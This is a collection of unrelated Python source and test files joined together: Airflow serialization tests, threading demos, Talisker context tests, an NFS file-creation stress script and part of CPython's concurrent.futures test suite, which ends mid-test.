SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.params["none"] is None
assert isinstance(dict.__getitem__(dag.params, "none"), Param)
assert dag.params["str"] == "str"
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
        # Load the module from scratch; this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
multithreading.py
|
import time
import threading
def calc_square(numbers):
print("calculate square of numbers")
for n in numbers:
time.sleep(0.1)
print("square", n*n)
def calc_cube(numbers):
print('calculate cube of numbers')
for n in numbers:
time.sleep(0.1)
print("cube", n*n*n)
arr = [2,3,8,9]
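# Both workers are I/O-bound (they mostly sleep), so the GIL is released during
# time.sleep() and the two threads overlap: total wall time is roughly 0.4s
# (4 items * 0.1s) instead of ~0.8s if the two functions ran sequentially.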
t0 = time.time()
t1 = threading.Thread(target=calc_square, args=(arr,))
t2 = threading.Thread(target=calc_cube, args=(arr,))
t1.start()
t2.start()
t1.join()
t2.join()
print("done in:", time.time() - t0)
print("i am done with all of my work")
|
test_context.py
|
#
# Copyright (c) 2015-2021 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import threading
import time
from freezegun import freeze_time
import future.utils
import pytest
from talisker.context import (
Context,
ContextStack,
NullContextStack,
enable_gevent_context,
enable_eventlet_context,
request_timeout,
)
def test_context_api():
Context.new()
Context.logging.push(a=1)
Context.request_id = 'id'
Context.track('test', 1.0)
assert Context.current().logging.flat == {'a': 1}
assert Context.current().request_id == 'id'
assert Context.current().tracking['test'].count == 1
assert Context.current().tracking['test'].time == 1.0
Context.clear()
assert Context.current().logging.flat == {}
assert Context.current().request_id is None
assert Context.current().tracking == {}
def test_null_context():
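    # No Context.new() here, so (presumably) the null/no-op context backend is
    # active: every write below is silently discarded, which the asserts verify.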
Context.request_id = 'test'
Context.set_debug()
Context.soft_timeout = 10
Context.set_relative_deadline(10)
Context.track('sql', 1.0)
assert Context.request_id is None
assert Context.debug is False
assert Context.soft_timeout == -1
assert Context.deadline_timeout() is None
assert Context.current().tracking == {}
with Context.logging(foo='bar'):
assert Context.logging.flat == {}
def test_context_thread():
e1 = threading.Event()
e2 = threading.Event()
def worker():
Context.new()
Context.logging.push(a=2)
Context.track('test', 1.0)
e1.set()
e2.wait()
assert Context.logging.flat == {'a': 2}
Context.logging.pop()
e1.set()
assert Context.logging.flat == {}
assert Context.current().tracking['test'].count == 1
t = threading.Thread(target=worker)
Context.new()
Context.track('test', 1.0)
Context.logging.push(a=1)
assert Context.logging.flat == {'a': 1}
t.start()
e1.wait()
e1.clear()
assert Context.logging.flat == {'a': 1}
assert Context.current().tracking['test'].count == 1
e2.set()
e1.wait()
assert Context.logging.flat == {'a': 1}
t.join()
def test_context_gevent(request):
try:
import gevent
except ImportError:
pytest.skip('gevent must be installed')
request.addfinalizer(enable_gevent_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
gevent.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
g1 = gevent.spawn(f1)
g2 = gevent.spawn(f2)
gevent.joinall([g1, g2], timeout=2)
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="<py3.7 only")
def test_context_eventlet(request):
try:
import eventlet
except ImportError:
pytest.skip('eventlet must be installed')
request.addfinalizer(enable_eventlet_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
eventlet.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
pool = eventlet.GreenPool()
pool.spawn(f1)
pool.spawn(f2)
pool.waitall()
if future.utils.PY3:
from tests.py3_asyncio_context import test_context_asyncio # NOQA
def test_stack_basic():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.push(b=2)
assert stack['b'] == 2
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.push(a=3)
assert stack['a'] == 3
assert list(stack.items()) == [('a', 3), ('b', 2)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.pop()
with pytest.raises(KeyError):
stack['a']
assert list(stack.items()) == []
def test_stack_context_manager():
stack = ContextStack()
stack.push(a=1)
assert list(stack.items()) == [('a', 1)]
with stack(b=2):
assert list(stack.items()) == [('b', 2), ('a', 1)]
assert list(stack.items()) == [('a', 1)]
def test_stack_dict_arg():
stack = ContextStack()
with stack({'a': 1}):
assert list(stack.items()) == [('a', 1)]
with stack({'a': 1}, b=2):
# order not preserved, as kwargs
assert dict(stack) == {'a': 1, 'b': 2}
def test_stack_unwind():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
level = stack.push(a=2)
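    # push() apparently returns a level token; unwind(level) below rolls the
    # stack back to the state it had before that push.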
assert stack['a'] == 2
stack.push(a=3)
stack.push(a=4)
assert stack['a'] == 4
stack.unwind(level)
assert stack['a'] == 1
def test_null_context_stack():
stack = NullContextStack()
stack.push(a=1)
assert dict(stack) == {}
assert stack.flat == {}
def test_does_not_use_or_modify_dict():
stack = ContextStack()
d = {'a': 1}
stack.push(d, b=2)
assert stack['a'] == 1
assert stack['b'] == 2
assert d == {'a': 1}
d['a'] = 2
assert stack['a'] == 1
def test_tracking():
Context.new()
Context.track('sql', 1.0)
Context.track('sql', 2.0)
Context.track('http', 3.0)
assert Context.current().tracking['sql'].count == 2
assert Context.current().tracking['sql'].time == 3.0
assert Context.current().tracking['http'].count == 1
assert Context.current().tracking['http'].time == 3.0
@freeze_time()
def test_request_timeout():
Context.new()
result = {}
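    # timeout/soft_timeout appear to be expressed in milliseconds: with time
    # frozen by freeze_time, the deadline recorded inside f() is exactly now + 1.0s.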
@request_timeout(timeout=1000, soft_timeout=500)
def f():
result['timeout'] = Context.current().deadline
result['soft_timeout'] = Context.soft_timeout
f()
assert result['timeout'] == time.time() + 1.0
assert result['soft_timeout'] == 500
|
thread_local.py
|
#!/usr/bin/env python3
import threading
# thread-local storage is used to pass per-thread data between functions within the same thread
local_school = threading.local()
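# Every thread that touches local_school gets its own independent 'student'
# attribute, so Thread-A's 'Alice' and Thread-B's 'Bob' never overwrite each other.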
def process_student():
std = local_school.student
print('Hello, %s (in %s)' % (std, threading.current_thread().name))
def process_thread(name):
local_school.student = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice',), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob',), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
|
open_create_stress.py
|
#!/usr/bin/env python3.6
"""
author: samuels (c) 2018
"""
import argparse
import time
import os
import sys
from queue import Queue
from threading import Thread
sys.path.append('../')
from client.generic_mounter import Mounter
from logger.server_logger import ConsoleLogger
logger = None
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--cluster", help="Cluster Name", required=True, type=str)
parser.add_argument("-e", "--export", help="NFS Export", default="/", type=str)
parser.add_argument("-d", "--test_dir", help="Directory under test", default="", type=str)
parser.add_argument('--start_vip', type=str, help="Start VIP address range")
parser.add_argument('--end_vip', type=str, help="End VIP address range")
return parser.parse_args()
def open_file_for_n_sec(q1, n, path):
global logger
i = 0
while True:
try:
filename = q1.get()
file_path = os.path.join(path, filename)
i += 1
            if i % 1000 == 0:  # print a progress dot every 1000 files
sys.stdout.write('.')
sys.stdout.flush()
f = open(file_path, 'w')
f.write('abcd')
f.flush()
os.unlink(file_path)
# time.sleep(.01)
f.close()
except (IOError, OSError) as err:
logger.error("Thread raised error: {}".format(err))
raise err
def main():
global logger
logger = ConsoleLogger('bmp_split_stress').logger
q1 = Queue(maxsize=10)
num_threads = 100
num_files = 100000
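    # Producer/consumer layout: main() pushes num_files names into the bounded
    # queue while num_threads daemon workers pop names and create/write/unlink
    # each file on a randomly chosen NFS mountpoint.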
args = get_args()
logger.info("Mounting work path...")
mounter = Mounter(args.cluster, args.export, 'nfs3', 'OPEN_CREATE_STRESS', logger=logger, nodes=0,
domains=0, sudo=True, start_vip=args.start_vip, end_vip=args.end_vip)
try:
mounter.mount_all_vips()
except AttributeError:
logger.warn("VIP range is bad or None. Falling back to mounting storage server IP")
mounter.mount()
for i in range(num_threads):
path = mounter.get_random_mountpoint()
worker = Thread(target=open_file_for_n_sec, args=(q1, 1, path))
        worker.daemon = True
worker.start()
for i in range(num_files):
q1.put('t%d' % i)
time.sleep(2)
if __name__ == "__main__":
main()
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
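# Pre-built futures frozen in various states; the wait()/as_completed() tests
# below mix these with live futures submitted to a real executor.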
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, ctx):
mgr = get_context(ctx).Manager()
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
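    # Builds one concrete TestCase per executor flavour by combining the behaviour
    # mixin with each executor mixin and registering the generated class in
    # globals(), so unittest discovery picks up e.g. ProcessPoolForkWaitTest.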
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
        call_queue = executor._call_queue
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertWarns(DeprecationWarning):
future = self.executor.submit(fn=capture, arg=1)
self.assertEqual(future.result(), ((), {'arg': 1}))
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
    @unittest.skipUnless(sys.platform == 'win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
